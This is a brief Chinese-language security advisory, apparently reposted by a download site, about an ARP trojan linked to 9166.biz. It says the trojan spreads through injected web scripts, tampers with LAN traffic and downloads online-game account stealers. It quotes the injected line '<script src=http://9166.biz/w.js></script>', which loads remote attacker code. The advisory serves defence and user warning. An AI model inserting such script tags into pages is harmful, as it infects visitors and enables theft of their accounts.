近日，360安全中心接到大量用戶的舉報(bào)，稱全局域網(wǎng)的電腦中都出現(xiàn)了彈出5y5.us或9166.biz等網(wǎng)頁(yè)，電腦被種植多個(gè)木馬病毒，時(shí)常斷網(wǎng)等現(xiàn)象。360安全中心的工程師隨即對(duì)此進(jìn)行了分析。yrk紅軟基地
9166.biz  ---ARP木馬病毒的惡意行為：yrk紅軟基地

1.通過網(wǎng)頁(yè)漏洞傳播：該病毒通過植入網(wǎng)站上的一句JS腳本，導(dǎo)致有XML等漏洞的機(jī)器中招，成為此ARP病毒的傳播源yrk紅軟基地

2.ARP攻擊篡改局域網(wǎng)數(shù)據(jù)包，一臺(tái)電腦中招，局域網(wǎng)內(nèi)的所有用戶均遭殃：該病毒在整個(gè)局域網(wǎng)用戶上網(wǎng)的網(wǎng)頁(yè)中增加"<script src=http://9166.biz/w.js></script>"等內(nèi)容，從而使局域網(wǎng)內(nèi)有XML漏洞的電腦同時(shí)感染此病毒。yrk紅軟基地

3.查殺困難，整個(gè)網(wǎng)絡(luò)不時(shí)掉線：由于遭受攻擊的局域網(wǎng)一般都是多臺(tái)電腦感染，同時(shí)發(fā)起ARP攻擊，因此整個(gè)局域網(wǎng)很不穩(wěn)定，時(shí)常掉線甚至癱瘓。而且由于機(jī)器之間互相感染，因此徹底查殺及恢復(fù)非常困難。yrk紅軟基地

4.后臺(tái)下載多個(gè)熱門游戲木馬：該木馬會(huì)自動(dòng)到網(wǎng)上下載夢(mèng)幻、征途、江湖、魔域、武林外傳、奇跡世界、天龍八部、傳奇世界、完美國(guó)際、風(fēng)云、魔獸、江湖、QQ幻想等十多款網(wǎng)絡(luò)游戲木馬，偷竊用戶游戲帳戶。yrk紅軟基地

據(jù)360安全中心專家分析，此ARP木馬病毒已經(jīng)導(dǎo)致了上百萬臺(tái)電腦感染，數(shù)萬個(gè)局域網(wǎng)絡(luò)頻臨癱瘓。360安全衛(wèi)士已經(jīng)在第一時(shí)間推出了專殺工具，供受害用戶使用。同時(shí)，只要用戶使用360安全衛(wèi)士勤打系統(tǒng)補(bǔ)丁，就不會(huì)感染此木馬病毒，防患于未然。yrk紅軟基地